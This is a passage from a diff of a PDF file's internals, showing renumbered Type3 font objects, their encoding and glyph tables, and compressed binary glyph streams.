`-~„ÓôìÆ&lpˆ‡B2e™ÚŒZš-?šó&†¾ÀA–Œé– î㤻_*³—‚2z•S¼ÑbI_9þ`QJi©ŸßØthwT”h×ÒEÛ}Ðßï鈶ټSŽ¶¥}NÙ»–˜a÷lÌ}ì!â!xHĢ µK{Ñ0S%¦ÓYLæIŒÙ±„4¬^½vA:ÓCžõÿ5ûÏ2?¹j,TÓkØ„pÂgÙ àe3D^63ÔìŸÅU‡[¼}l* endstream endobj -1325 0 obj << +1200 0 obj << /Length 245 /Filter /FlateDecode >> @@ -8248,7 +7120,16 @@ W ݹÌÑ5ôòüú€nyyJºÝ”ßb³"fo8ü7a êLìàŒ¸{؈kq€ÐàEoÄÚ›A ª I¿sLÅlL;q›‰é6‘­˜ð,ú)þˆŽ"pøkë'ëaÒö“šß “6ª«jùTº…vûMtÕ%ü¥yþÖpû®É7«±šc%^–Æ ð¬Á+üš~oì endstream endobj -1326 0 obj << +1201 0 obj << +/Length 200 +/Filter /FlateDecode +>> +stream +xÚMÎ? +Â0Çñ_ÉPxKŽÐwÓÚ‚bÁ?`A'qRGE¡ƒÐ-Gñ;ˆñ¥.ù@^ø’W EÁ)çáŒ9ñ)£+åa–†kx8^hV‘Ùq^YÉ”Lµæûíq&3ÛÌ9#³à}Æ骗Þ{÷G«¼-m,@{L¡?˜ y㉲§C¦|Ï uäj%@ª* éy RM§œT—rR)§~ØØI;Ýó¶Ri+&¶éPÚ¦¼•õþ¡eE[ú´åfN +endstream +endobj +1202 0 obj << /Length 188 /Filter /FlateDecode >> @@ -8257,7 +7138,7 @@ xڵб Â0€á+Â-}„Þ hšP:j3:9ˆSutPt®à‹ù(}„ŽJc¼ quù†ËûO¥óTSLŠf’”"­è(ñ‚Iæ†1ií_ª3ÅŽ’ ÅÊQ˜5Ý®÷Šb³ ‰¢¤½¤ø€¦$,D¶¨m`ŸX˜ôP?¦䯰…¨a"GËä „ÝHíè¿°Žáüú’ñ[¹%=ãΡ‹i¸ˆÛ¸’{}9ßàs \Üâ#G— endstream endobj -1327 0 obj << +1203 0 obj << /Length 122 /Filter /FlateDecode >> @@ -8265,7 +7146,7 @@ stream xÚ31×37U0P0bCS…C®B.cc ßÄI$çr9yré‡+sé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]ä€ÀDübvQ$þÿG%úAüȨÿÿÿÁåêÉÈB•\ endstream endobj -1328 0 obj << +1204 0 obj << /Length 231 /Filter /FlateDecode >> @@ -8276,7 +7157,7 @@ x ©Ð¤ šÙõKXÿ™"9ãØß°öC¯ú"‚ãƒùÊÞáN¤¶¶šàžç‚ +–o¨q‘Ô ™€ï@æF2ŠÌÏh.ÊpFmLF IÿA.g¹•OÕ¬—´ endstream endobj -1329 0 obj << +1205 0 obj << /Length 237 /Filter /FlateDecode >> @@ -8285,7 +7166,7 @@ x ™]Ý?b q«BM@¯i•‰•‰•…ojao˜[€hJ\ìKþÅZOŠ~V¨Þ¯²ü¼!!fõÅ%j™ÔvîTX#§-EDSµ¹Ö×0mºè™~@‘ endstream endobj -1330 0 obj << +1206 0 obj << /Length 188 /Filter /FlateDecode >> @@ -8295,7 +7176,7 @@ xڕϱ Yú6O`[¼Ò¥T¨¼AÐÉAœÔÑAQèP°ÖGé#tt«—ªtò $áB¢ÓyšpÄ :áDó%¦;éØ摤Ò8ߨ0XÇnl•B³åçãu¥°Ø­ØVK>Ú/'2%;ŽãµÇÀ%|ÃAtG*èA0‡¬`/ºPu°½Fô19€9¬a{ÑíDíªb#úØj3XÃä5S¯øS… imhO_o`{ endstream endobj -1331 0 obj << +1207 0 obj << /Length 229 /Filter /FlateDecode >> @@ -8305,7 +7186,7 @@ xڅϱN Ñ©j…Àd|ÉŒL@Àä6ììmБÜT /åˆõ¤sg`À|¸®Œ¿8c†Â¨Ò’5 MñÃÙâ—”i\Qn+ ¥yrŠevœEs¬á‡Žwü Ô4„s endstream endobj -1332 0 obj << +1208 0 obj << /Length 235 /Filter /FlateDecode >> @@ -8313,7 +7194,7 @@ stream xÚuÏ=NÄ0à¥Mã#x.N´ŽV[YZ‰HPQ * ¤Aíp³%G0¢ÀE”a²» ÍgûYš¿<]6\±ç“š½çÆóCMÏ´XiXqÓì~îŸhÝ’»áÅŠÜ…ÆäÚK~}y{$·¾:ãšÜ†ok®î¨Ý0`2™€R¤Ó—é†r@ìŠI…ÀærBÈG£b¶dÅþ2lRÌ“V;äxFïò!#äSòÕI§gìµk4I±Yòžñ€;ý!þGøaÜbóžÝ¸óài^aÐeb_È»î+:‚¶‡ÑÚ(4¢ó–®é–•™ endstream endobj -1333 0 obj << +1209 0 obj << /Length 200 /Filter /FlateDecode >> @@ -8323,7 +7204,7 @@ xÚϱ ¨ç‘R0¤‡Gô=9›Îö€qŠîŠ|ÝÇè¦s:Ÿ.{tãÅ„8MhÍ3L®±â“+ÿ"dL-V¢K±x{°pprm î%@%*­!š¥ÞiÉfúÈ£ú1ƒÖºÕh¬´fG«£Ý¨ZŸFéȶ> @@ -8334,7 +7215,7 @@ x ^/x?}Ï“… endstream endobj -1335 0 obj << +1211 0 obj << /Length 237 /Filter /FlateDecode >> @@ -8343,98 +7224,100 @@ x Ài‚&dš r¢˜†2!Œ.ÁG?pS8’ôÈ|9‡]ó'ø?‚XP‹T)æL%—ü[2Õ/±jNl¥›þ§”>9Û’¼5þ‰FX ü”éà¢=Ø … Œ–W¨UÊUG@—˜ºîéž~Uí–Ž endstream endobj -420 0 obj << +503 0 obj << /Type /Font /Subtype /Type3 /Name /F21 /FontMatrix [0.01204 0 0 0.01204 0 0] -/FontBBox [ -6 -21 97 62 ] +/FontBBox [ -6 -26 97 62 ] /Resources << /ProcSet [ /PDF /ImageB ] >> /FirstChar 21 -/LastChar 121 -/Widths 1336 0 R -/Encoding 1337 0 R -/CharProcs 1338 0 R +/LastChar 122 +/Widths 1212 0 R +/Encoding 1213 0 R +/CharProcs 1214 0 R >> endobj -1336 0 obj -[47.75 0 0 0 0 0 55.7 53.05 53.05 0 0 0 0 0 0 0 0 0 26.53 37.14 37.14 0 0 26.53 31.83 26.53 0 47.75 47.75 47.75 47.75 47.75 47.75 47.75 47.75 47.75 47.75 26.53 0 0 0 0 0 0 72.2 67.93 68.97 73.23 62.74 60.09 75.08 74.73 36.21 49.36 0 57.43 90.65 74.73 71.73 65.28 71.73 71.62 53.05 66.43 73.46 72.2 98.72 72.2 0 0 0 0 0 0 0 0 46.42 53.05 42.44 53.05 43.77 29.18 47.75 53.05 26.53 29.18 50.4 26.53 79.58 53.05 47.75 53.05 50.4 39.33 37.67 37.14 53.05 50.4 68.97 50.4 50.4 ] +1212 0 obj +[47.75 0 0 0 0 0 55.7 53.05 53.05 0 0 0 0 0 0 0 0 74.27 26.53 37.14 37.14 0 0 26.53 31.83 26.53 0 47.75 47.75 47.75 47.75 47.75 47.75 47.75 47.75 47.75 47.75 26.53 0 0 0 0 0 0 72.2 67.93 68.97 73.23 62.74 60.09 75.08 74.73 36.21 49.36 74.85 57.43 90.65 74.73 71.73 65.28 71.73 71.62 53.05 66.43 73.46 0 98.72 0 0 0 0 0 0 0 74.27 0 46.42 53.05 42.44 53.05 43.77 29.18 47.75 53.05 26.53 29.18 50.4 26.53 79.58 53.05 47.75 53.05 50.4 39.33 37.67 37.14 53.05 50.4 68.97 50.4 50.4 42.44 ] endobj -1337 0 obj << +1213 0 obj << /Type /Encoding -/Differences [21/a21 22/.notdef 27/a27/a28/a29 30/.notdef 39/a39/a40/a41 42/.notdef 44/a44/a45/a46 47/.notdef 48/a48/a49/a50/a51/a52/a53/a54/a55/a56/a57/a58 59/.notdef 65/a65/a66/a67/a68/a69/a70/a71/a72/a73/a74 75/.notdef 76/a76/a77/a78/a79/a80/a81/a82/a83/a84/a85/a86/a87/a88 89/.notdef 97/a97/a98/a99/a100/a101/a102/a103/a104/a105/a106/a107/a108/a109/a110/a111/a112/a113/a114/a115/a116/a117/a118/a119/a120/a121] +/Differences [21/a21 22/.notdef 27/a27/a28/a29 30/.notdef 38/a38/a39/a40/a41 42/.notdef 44/a44/a45/a46 47/.notdef 48/a48/a49/a50/a51/a52/a53/a54/a55/a56/a57/a58 59/.notdef 65/a65/a66/a67/a68/a69/a70/a71/a72/a73/a74/a75/a76/a77/a78/a79/a80/a81/a82/a83/a84/a85 86/.notdef 87/a87 88/.notdef 95/a95 96/.notdef 97/a97/a98/a99/a100/a101/a102/a103/a104/a105/a106/a107/a108/a109/a110/a111/a112/a113/a114/a115/a116/a117/a118/a119/a120/a121/a122] >> endobj -1338 0 obj << -/a21 1274 0 R -/a27 1276 0 R -/a28 1275 0 R -/a29 1277 0 R -/a39 1269 0 R -/a40 1267 0 R -/a41 1268 0 R -/a44 1270 0 R -/a45 1273 0 R -/a46 1271 0 R -/a48 1326 0 R -/a49 1327 0 R -/a50 1328 0 R -/a51 1329 0 R -/a52 1330 0 R -/a53 1331 0 R -/a54 1332 0 R -/a55 1333 0 R -/a56 1334 0 R -/a57 1335 0 R -/a58 1272 0 R -/a65 1278 0 R -/a66 1279 0 R -/a67 1280 0 R -/a68 1281 0 R -/a69 1282 0 R -/a70 1283 0 R -/a71 1284 0 R -/a72 1285 0 R -/a73 1286 0 R -/a74 1287 0 R -/a76 1288 0 R -/a77 1289 0 R -/a78 1290 0 R -/a79 1291 0 R -/a80 1292 0 R -/a81 1293 0 R -/a82 1294 0 R -/a83 1295 0 R -/a84 1296 0 R -/a85 1297 0 R -/a86 1298 0 R -/a87 1299 0 R -/a88 1300 0 R -/a97 1301 0 R -/a98 1302 0 R -/a99 1303 0 R -/a100 1304 0 R -/a101 1305 0 R -/a102 1306 0 R -/a103 1307 0 R -/a104 1308 0 R -/a105 1309 0 R -/a106 1310 0 R -/a107 1311 0 R -/a108 1312 0 R -/a109 1313 0 R -/a110 1314 0 R -/a111 1315 0 R -/a112 1316 0 R -/a113 1317 0 R -/a114 1318 0 R -/a115 1319 0 R -/a116 1320 0 R -/a117 1321 0 R -/a118 1322 0 R -/a119 1323 0 R -/a120 1324 0 R -/a121 1325 0 R +1214 0 obj << +/a21 1149 0 R +/a27 1151 0 R +/a28 1150 0 R +/a29 1152 0 R +/a38 1153 0 R +/a39 1144 0 R +/a40 1141 0 R +/a41 1142 0 R +/a44 1145 0 R +/a45 1148 0 R +/a46 1146 0 R +/a48 1202 0 R +/a49 1203 0 R +/a50 1204 0 R +/a51 1205 0 R +/a52 1206 0 R +/a53 1207 0 R +/a54 1208 0 R +/a55 1209 0 R +/a56 1210 0 R +/a57 1211 0 R +/a58 1147 0 R +/a65 1154 0 R +/a66 1155 0 R +/a67 1156 0 R +/a68 1157 0 R +/a69 1158 0 R +/a70 1159 0 R +/a71 1160 0 R +/a72 1161 0 R +/a73 1162 0 R +/a74 1163 0 R +/a75 1164 0 R +/a76 1165 0 R +/a77 1166 0 R +/a78 1167 0 R +/a79 1168 0 R +/a80 1169 0 R +/a81 1170 0 R +/a82 1171 0 R +/a83 1172 0 R +/a84 1173 0 R +/a85 1174 0 R +/a87 1175 0 R +/a95 1143 0 R +/a97 1176 0 R +/a98 1177 0 R +/a99 1178 0 R +/a100 1179 0 R +/a101 1180 0 R +/a102 1181 0 R +/a103 1182 0 R +/a104 1183 0 R +/a105 1184 0 R +/a106 1185 0 R +/a107 1186 0 R +/a108 1187 0 R +/a109 1188 0 R +/a110 1189 0 R +/a111 1190 0 R +/a112 1191 0 R +/a113 1192 0 R +/a114 1193 0 R +/a115 1194 0 R +/a116 1195 0 R +/a117 1196 0 R +/a118 1197 0 R +/a119 1198 0 R +/a120 1199 0 R +/a121 1200 0 R +/a122 1201 0 R >> endobj -1339 0 obj << +1215 0 obj << /Length 327 /Filter /FlateDecode >> @@ -8443,7 +7326,7 @@ xÚ•Ó¿j ¥ endstream endobj -1340 0 obj << +1216 0 obj << /Length 338 /Filter /FlateDecode >> @@ -8452,7 +7335,7 @@ x Cœ4ôqú¢ŽHºèG®¹‹nJÛè°¬‰®³œcÔC +{ç7ZÛÎÛ¶>»ƒ Úà¿¢‹*E!¼Õe¥nÕ/ÙÏíã endstream endobj -1341 0 obj << +1217 0 obj << /Length 258 /Filter /FlateDecode >> @@ -8461,7 +7344,7 @@ x kmªgjÖ.=W´¥€Ms³ endstream endobj -1342 0 obj << +1218 0 obj << /Length 192 /Filter /FlateDecode >> @@ -8469,7 +7352,21 @@ stream xÚ³0Ò33S0P0bs  #…C®B.sc ßÄI$çr9yré‡+˜sé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]þCÁbY ìÿ?00ðÿÿe1 Xòp?œÅg1ÃYŒp‚UgÕÃYöxYò¤³À,æ üD²p²Øñ²øá,y8ËÆbüe‰,„^$óìà'Ò}ÌTaAÀf“õRX\®ž\\1=# endstream endobj -1343 0 obj << +1219 0 obj << +/Length 123 +/Filter /FlateDecode +>> +stream +xÚ340Ò³0Q0PaKK #…C®B.KßÄ1’s¹œ<¹ôÃ,M¸ô=€¢\úž¾ +%E¥©\úNÎ +†\ú. +ц +±\ž. +ÿA Dþ!•ÍÀþÿØÿo`e +Èb†á gS’7¹\=¹¹üïb +endstream +endobj +1220 0 obj << /Length 105 /Filter /FlateDecode >> @@ -8479,7 +7376,7 @@ x ÿA ÉÀþÿÃ(9THü±ÉåêÉÈ’:Õ° endstream endobj -1344 0 obj << +1221 0 obj << /Length 157 /Filter /FlateDecode >> @@ -8489,7 +7386,7 @@ x ä6n6 endstream endobj -1345 0 obj << +1222 0 obj << /Length 233 /Filter /FlateDecode >> @@ -8498,7 +7395,7 @@ x Â@ †S:Y|„æô]ª‚ÄIÝÄöÑú(>BGñLÓZD''—|ü¹ÿr7œÑ¦©;¤©M CA‡º>­ î0ðYÔÔmÕÃ՜՘eTÑ„ûãU8A5¤…!½ÄhH–ãàpɾe¨Û ä§P±þóï¸Vrÿ…{ÂÙŸy¹%ŸÞرWáÛ K¶¹Žp,ìŠ+¾ç¹&ûÂuaÏJNE±IÞM ºœ4y0犉%®Þ­àØ^žÃù ŽâAlæH 4È—¬6eOæ†E8Ã`ò| endstream endobj -1346 0 obj << +1223 0 obj << /Length 270 /Filter /FlateDecode >> @@ -8507,7 +7404,7 @@ xÚ• -ÜeùØ™Ùÿgêêr¹”B®ä¢”º’ª’MÉï\‚]Õ1óòÆ«–óG© Îo-Ìy{'Ÿ_¯œ¯î¯¥ä|-O¥ÏÜ®…¨ +S݃Nu½ªíÚ¥#¥(È,¨Ü’?!é‡HütN§¿saoñLO±-%c$Ö?iÊÁT#}$® ÓpªóëÍ]ì&QÏ|ܤ§™9éŠgvAgÿ¦;§Õ7F?s„¤.àÿoÝë—t·wÚgE¦Áuª=lŒ`,æ~¨0ˆoZ~àŸß΢ endstream endobj -1347 0 obj << +1224 0 obj << /Length 243 /Filter /FlateDecode >> @@ -8516,7 +7413,7 @@ xÚµ ö5¾£_‰XQ¸™&oG\7èväWèEF×<ÑçÇ×Ýz{O5º ½ÔT½b³!€ÿ€œÈ£‚™Oª±ª–!2J`@;€÷PŽPÈ<²;…‘GgÈ3E9c̈¹*lÊ0´9Útüø / Îà Ýìi†Õnʲm'¾©¿;)¤ø–),åˆbÈߘ^‹ìJq™©Ý‚§®£zµlÑð¡ÁgüÍF‹¾ endstream endobj -1348 0 obj << +1225 0 obj << /Length 253 /Filter /FlateDecode >> @@ -8526,7 +7423,7 @@ x ³7ž#†Ýfæýß".ŒÎF«?«Ç^Q 3Ò™Ö Ýщb= endstream endobj -1349 0 obj << +1226 0 obj << /Length 244 /Filter /FlateDecode >> @@ -8535,7 +7432,7 @@ xÚ… Ø÷aãhDBÿcü³!ýD[Áo˜¬1¿En¥ ¹±¦ä%iêÝînª6N:ó\ÒZÛ` æ]H›_ÙI<ð?yë­œ endstream endobj -1350 0 obj << +1227 0 obj << /Length 324 /Filter /FlateDecode >> @@ -8545,7 +7442,7 @@ xÚ¥ é endstream endobj -1351 0 obj << +1228 0 obj << /Length 187 /Filter /FlateDecode >> @@ -8553,7 +7450,7 @@ stream xÚ37Ö3°P0P0bsC c…C®B.33 ßÄI$çr9yré‡+˜™qé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]ì0€Áÿÿ$0˜a †aÃÿeüÿßf0ÿÿÿÌà‡xûÿùõÀŒ:û`PÛãçã?Hÿÿß  e00°ÿ?€Ìø‡ÁøCãÇ(ÎøŒv q€—«'W lù2 endstream endobj -1352 0 obj << +1229 0 obj << /Length 138 /Filter /FlateDecode >> @@ -8561,7 +7458,7 @@ stream xÚ36Ó35Q0Pacc …C®B.# ßÄI$çr9yré‡+Ypé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]ìþ``üÿ€ùÿ0fÿÿ+†ÉƒÔ‚ô€õ’ ä0üÿ‰˜aˆàÿÿÿ@Ç\®ž\\ÍÙ¥; endstream endobj -1353 0 obj << +1230 0 obj << /Length 107 /Filter /FlateDecode >> @@ -8569,7 +7466,7 @@ stream xÚ36Ó35Q0Pac c…C®B.#K ßÄI$çr9yré‡+Yré{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]ì0üÿ‰™˜aãÄÿ„Ž¹\=¹¹µ‰Ã endstream endobj -1354 0 obj << +1231 0 obj << /Length 232 /Filter /FlateDecode >> @@ -8577,7 +7474,7 @@ stream xÚíÒ½jAð WÓÜ#Ü>·ÔŒ‚WZ¥©LÊ+³vrp!E¶›üçT°+‹ ó›Ý-ÆÙÇvïÞXÓÅqöÁt;æÍñ';ë±j-->x˜súŒÇéiNó©Y-×ïœgOÙ‘yÁÌ+ç#CYEI ºO$RáxŠ%4ˆDJʤnï«Ò ó¢£ØÒ×®U¶¤ Hª@Yûƒ$߸»Np·â§¤D@¥(€þ¿ØAx^ƒæ §¨å9ìÅE…ÿÇÍÛ„ÂÆip xœóœÿvÚiC endstream endobj -1355 0 obj << +1232 0 obj << /Length 184 /Filter /FlateDecode >> @@ -8585,7 +7482,7 @@ stream xÚíѱ‚@ à& &]xúÞÜHLtr0Nêè ÑUy´{ጃ „zwÀ¡Í×6ÿÔd4”’™JBG´ñ„qlfiG{Ø1+P¬)ŽQÌÍE± Ëùz@‘-§¢Èi’Üb‘¤‚˜µ©ÒÁc®|æÚ!P÷Æái à±®!`{èø.ÿT¼ÊV6ß¡ýAÓõ_°yÍÀ4Õ8+p…o âøš endstream endobj -1356 0 obj << +1233 0 obj << /Length 231 /Filter /FlateDecode >> @@ -8593,7 +7490,7 @@ stream xÚµ‘±‚0†kHná¼Ђ±0’ &2˜èä`œÔÑA£3<šÂ#02Î^KL%!_sý{½þ¬æI‚!.qa¼@¥ðÁCT±Ý9ß +@P% 7º ²Øâóñº‚Ìv+Œ@æxŒ0> @@ -8601,7 +7498,7 @@ stream xÚÍ’¿NÃ@ Æ]u¨ä…G¨_.!MB§H¥•š ¦02€èœ<’GÈx•ªÛ¹F:¡.§Ÿ¾óùÏçË“«è†"Jèò:¡lN錞c|Ã,5¢<WO¯¸(Ñm(KÑ­EGWÞÑÇûîÝâþ–btKÚÆ=b¹$(“#ýÑÃ!@5@÷Šøo˜J ÿ§4ö{®aäÁ³ÅŒòßëŽfJ®`o}4¼‘.lO­%Þw£‹m_…mt§¢e4](z†`_ëTÀU‰øµ`  endstream endobj -1358 0 obj << +1235 0 obj << /Length 169 /Filter /FlateDecode >> @@ -8612,7 +7509,7 @@ x Eá¢^¹˜6¡–­É±Câ‰:_øˆ:WóÑ«}ßÍO_ /h‰ Æmƒú ýIž™–¶ðj^¤ï endstream endobj -1359 0 obj << +1236 0 obj << /Length 259 /Filter /FlateDecode >> @@ -8620,7 +7517,7 @@ stream xÚ]Ð1NÃ@Ð¥°4¾;ÛŠBƒ¥$\ ‘ŠQ%Ú¬æ£ì\¦°v˜Y)¢yÒî·çÝT—ëk.¹æ‹Šë57 ¿UôIõJ/Kn®æäõƒ6O\¯¨¸×k*ºþþúy§bóxË[~®¸|¡nËXÊp8™ÎÙë…HDÑFä#ò°Ô々Ú~Àþ¨¨7ö'ÉQÈ”´^;LKZ+45qj@.dêtÜÇv“ù!¤¸Ç"iíÐÄÌôehÖ”ôÁjÛ]ˆÿdVçµ³½ÍSuž‡è ±ýõ?h©›ÓêgåcfKxýºëhG¿Á•¡Z endstream endobj -1360 0 obj << +1237 0 obj << /Length 186 /Filter /FlateDecode >> @@ -8632,7 +7529,7 @@ x E` q¹zrr:é“p endstream endobj -1361 0 obj << +1238 0 obj << /Length 187 /Filter /FlateDecode >> @@ -8642,7 +7539,7 @@ x àö„wåÂ6î .n ŸÁÉÁNÃõ<sUÃv‹öÁ848Å”Ìðn endstream endobj -1362 0 obj << +1239 0 obj << /Length 309 /Filter /FlateDecode >> @@ -8651,7 +7548,7 @@ xÚ• ¦evb8Ñ83Mð‹mH Є̎iÃoì˜Â“z˜ÑÌ>úBa"0‡Ži5s?hbé8–TÔ0µcíÙÌÄô00c*ÓCïÙ»1í‚Ö ¸ˆi<¸8Î^°óŽ‹˜­gëvJpÏi\DäXî‘ו¼—!‚ý) endstream endobj -1363 0 obj << +1240 0 obj << /Length 310 /Filter /FlateDecode >> @@ -8661,7 +7558,7 @@ D õIP×Z§ël§klku釾2#}UJ.´Ò†RÌym®Íaɽï endstream endobj -1364 0 obj << +1241 0 obj << /Length 137 /Filter /FlateDecode >> @@ -8673,7 +7570,7 @@ x pV0äÒwQˆ6T0ˆåòtQ```c;0ùD0ƒI~0Y"ÙÿIæÿ ò?&ù¤æDå(I²ôÿÿà"¹\=¹¹VI¢” endstream endobj -1365 0 obj << +1242 0 obj << /Length 301 /Filter /FlateDecode >> @@ -8681,7 +7578,7 @@ stream xÚ}ÑMJÅ0à)Y²é’Ø–G_]x>Á.]¹WêÒ…¢ëôh=JŽe¥ãüˆ? Ú¯if¦“tߟ ChÞ¯6 §á±s/®ßÑ\¦¼ððì£knC¿sÍ%½uÍxÞ^ߟ\s¸>kŽá® í½Ào@£B,D¸'€DdZš"-š,-ÚB/6¨3"x‰š¢äç”™œ®—ÓÊ®k‰í ƒËpÞ7q|Ì$pãFúæš¿È »ùdíL™@ÚAvüZ´H¥ÙFÓ¬¦YM«5Þk|,ZdÖìI³eb4Ðj`Môä³g!@Tt¶«`[ÈBÍ».àA8ã²EþõËwÌ•b«ÔŠW¢’üÉü'îbt7î}tû” endstream endobj -1366 0 obj << +1243 0 obj << /Length 305 /Filter /FlateDecode >> @@ -8690,7 +7587,7 @@ xÚ @IA烋 á·ì|ýgf.ëK xQá®Âz¯•ÿð!ðe‰õ•Y^Þý¡õÅ#†à‹[¾öE{‡_Ÿßo¾8Ü_cå‹#>UX>ûöˆ)Eৣ‰¿ŽˆN£ÈGG#›"ˆqhfHøÔ8¾ÏéäfEÊAEIÅÈ=¿ÿ„Å-ˆÎ’%$©#쵂H\ÀÕWèfä¹  Íhg™…™cgݺi†¹8iZþG«`©s+´¤É,25×ô\iÜ`2[Ì[¸¨ÈE3)Dä/ˆþbZÁ1.8Gƒ ƒ•I¬³éUuužR¯áÍ:îXÔ&¼oÝ´í]Ö¯"MºÎÝß´þÁÿéýëo endstream endobj -1367 0 obj << +1244 0 obj << /Length 225 /Filter /FlateDecode >> @@ -8698,7 +7595,7 @@ stream xڽнjÃ0ð ‚[ôº'ˆìPÛt±!têP2µ;´4›qüh~?‚G‚$ÎýÅC»õ@ú¡Bw—&ó,㈮+]pöÈo1}R2æ¢ñ8^¼~в$ÿÌIF~{Í’/wüýu|'¿Ü¯8&¿æ—˜£•kžnûLMÔÐ@;ÑÁž&žEõD-twñ>‡5 pU/jh:ØŠ¶,PW+D5À^Ôh ma#:ôYÀVpÔ=ìDÓŠºb~9¬a€g‰æ/ÌÿŸuøÿwiSÒ]]Óq endstream endobj -1368 0 obj << +1245 0 obj << /Length 285 /Filter /FlateDecode >> @@ -8707,7 +7604,7 @@ xڭѽJ ‘ iþŸŒk›àäï!%Nó¹4tíaà(.JÚ‚bÒî> @@ -8717,7 +7614,7 @@ xÚ òŒø_ȹèíC!š‹"Þˆº%R­î/ºQ‘‰(Œ¶"!×V$ÞMÀ x#$“0"»W ­ ÎˆPrÂ(¨ì$Ó7´Ày?â Âîßèö"^Ò\æ%òˆI‘Éd¾«^EÀ€AíÈRɯiP7ë@tÊê4F¦¾Ã}œÒ·  CÔGƒÉžõöÊ~†\ö endstream endobj -1370 0 obj << +1247 0 obj << /Length 239 /Filter /FlateDecode >> @@ -8726,7 +7623,16 @@ xÚ­Ò±j ´%ð1Šîs °à< (G˜®Ï‹(ºnhÄÉõ<œA홀°OîÐÂS€ÆiüX+ÒÃé"¬]ö1¨Õö n\PrÀ䚇cDôÆÞ§ý+Á"ZlÎ`eºúý1´ÌiEWÂÁL endstream endobj -418 0 obj << +1248 0 obj << +/Length 339 +/Filter /FlateDecode +>> +stream +xÚU‘1NÄ0E'JÉMŽ`_²)²ÊÒ²H¤@‚ŠQ-” ¨£…›øéHayøcARäIñÿù?ûî¼ïÍÎtæ¬5ûÖôæ¹UoªëðqgúË|rzU‡A5¦ëTsƒÏªnÍÇûç‹jwW¦UÍÑ<¶f÷¤†£!*y"<–Þ3Dà‰ê@¼àÈ“Æ¡©ŠD,#DQÄc!C<– S 1¹©úŸ`}½EØ fðŠQæjÙÀM5ÏA°˜øcÁ²¦Ç.%ó‚Í€€ %‚Æ ç œ9æd’QÿÅœrè™’t‘pI#xÙï$u_"E`—-5KˆfXÊz‘ qv, /&Áy¹6:)z…‹©veÒuFµA¹EøÅ”àVxXVˆ;Õ³]äß‘^KFƒùa9 +ÔjcªG²ëÜY•ëAEJ˜¨ëAÝ«D© +endstream +endobj +501 0 obj << /Type /Font /Subtype /Type3 /Name /F20 @@ -8735,52 +7641,54 @@ endobj /Resources << /ProcSet [ /PDF /ImageB ] >> /FirstChar 49 /LastChar 121 -/Widths 1371 0 R -/Encoding 1372 0 R -/CharProcs 1373 0 R +/Widths 1249 0 R +/Encoding 1250 0 R +/CharProcs 1251 0 R >> endobj -1371 0 obj -[65.77 65.77 65.77 65.77 65.77 65.77 65.77 0 0 0 0 0 0 0 0 0 99.31 0 95.01 100.81 0 82.66 0 0 48.44 0 0 79.01 0 0 0 0 0 0 0 0 101.07 0 0 0 0 0 0 0 0 0 0 0 65.77 0 58.47 73.08 59.81 0 65.77 73.08 36.54 0 0 36.54 109.62 73.08 65.77 73.08 0 53.39 51.89 51.16 73.08 0 95.01 0 69.43 ] +1249 0 obj +[65.77 65.77 65.77 65.77 65.77 65.77 65.77 65.77 0 0 0 0 0 0 0 0 99.31 0 95.01 100.81 0 82.66 0 102.84 48.44 0 0 79.01 0 0 0 0 0 0 0 0 101.07 0 0 0 0 0 0 0 0 0 0 0 65.77 0 58.47 73.08 59.81 0 65.77 73.08 36.54 0 0 36.54 109.62 73.08 65.77 73.08 0 53.39 51.89 51.16 73.08 0 95.01 0 69.43 ] endobj -1372 0 obj << +1250 0 obj << /Type /Encoding -/Differences [49/a49/a50/a51/a52/a53/a54/a55 56/.notdef 65/a65 66/.notdef 67/a67/a68 69/.notdef 70/a70 71/.notdef 73/a73 74/.notdef 76/a76 77/.notdef 85/a85 86/.notdef 97/a97 98/.notdef 99/a99/a100/a101 102/.notdef 103/a103/a104/a105 106/.notdef 108/a108/a109/a110/a111/a112 113/.notdef 114/a114/a115/a116/a117 118/.notdef 119/a119 120/.notdef 121/a121] +/Differences [49/a49/a50/a51/a52/a53/a54/a55/a56 57/.notdef 65/a65 66/.notdef 67/a67/a68 69/.notdef 70/a70 71/.notdef 72/a72/a73 74/.notdef 76/a76 77/.notdef 85/a85 86/.notdef 97/a97 98/.notdef 99/a99/a100/a101 102/.notdef 103/a103/a104/a105 106/.notdef 108/a108/a109/a110/a111/a112 113/.notdef 114/a114/a115/a116/a117 118/.notdef 119/a119 120/.notdef 121/a121] >> endobj -1373 0 obj << -/a49 1364 0 R -/a50 1365 0 R -/a51 1366 0 R -/a52 1367 0 R -/a53 1368 0 R -/a54 1369 0 R -/a55 1370 0 R -/a65 1339 0 R -/a67 1340 0 R -/a68 1341 0 R -/a70 1342 0 R -/a73 1343 0 R -/a76 1344 0 R -/a85 1345 0 R -/a97 1346 0 R -/a99 1347 0 R -/a100 1348 0 R -/a101 1349 0 R -/a103 1350 0 R -/a104 1351 0 R -/a105 1352 0 R -/a108 1353 0 R -/a109 1354 0 R -/a110 1355 0 R -/a111 1356 0 R -/a112 1357 0 R -/a114 1358 0 R -/a115 1359 0 R -/a116 1360 0 R -/a117 1361 0 R -/a119 1362 0 R -/a121 1363 0 R +1251 0 obj << +/a49 1241 0 R +/a50 1242 0 R +/a51 1243 0 R +/a52 1244 0 R +/a53 1245 0 R +/a54 1246 0 R +/a55 1247 0 R +/a56 1248 0 R +/a65 1215 0 R +/a67 1216 0 R +/a68 1217 0 R +/a70 1218 0 R +/a72 1219 0 R +/a73 1220 0 R +/a76 1221 0 R +/a85 1222 0 R +/a97 1223 0 R +/a99 1224 0 R +/a100 1225 0 R +/a101 1226 0 R +/a103 1227 0 R +/a104 1228 0 R +/a105 1229 0 R +/a108 1230 0 R +/a109 1231 0 R +/a110 1232 0 R +/a111 1233 0 R +/a112 1234 0 R +/a114 1235 0 R +/a115 1236 0 R +/a116 1237 0 R +/a117 1238 0 R +/a119 1239 0 R +/a121 1240 0 R >> endobj -1374 0 obj << +1252 0 obj << /Length 102 /Filter /FlateDecode >> @@ -8793,7 +7701,7 @@ x ÿ @ÎÆÆÆ¢¢¢ à—«'W Öõx endstream endobj -1375 0 obj << +1253 0 obj << /Length 85 /Filter /FlateDecode >> @@ -8806,16 +7714,7 @@ x ÿ €ËÕ“+ hz¯ endstream endobj -1376 0 obj << -/Length 226 -/Filter /FlateDecode ->> -stream -xÚ­=nA 